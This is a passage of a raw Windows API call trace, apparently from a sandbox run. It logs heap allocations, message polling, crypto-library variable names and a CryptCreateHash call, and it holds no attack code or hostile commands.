hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0265.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0265.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0265.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14038 | out: hHeap=0x970000) returned 1 [0265.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0265.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0265.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0265.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0265.072] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0265.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e58 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0265.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0265.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0265.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0265.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.073] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0265.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.073] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0265.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0265.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.074] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.074] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0265.074] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.074] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0265.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.074] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.075] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0265.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.075] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.075] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0265.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.075] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.075] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.076] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0265.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0265.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.076] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.076] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.076] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0265.077] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.077] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.077] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0265.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.077] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.077] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.077] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.077] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.078] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.078] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0265.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0265.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.078] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.078] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0265.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51eb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0265.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.079] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0265.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0265.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0265.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0265.079] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0265.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0265.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0265.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0265.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0265.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0265.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0265.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: 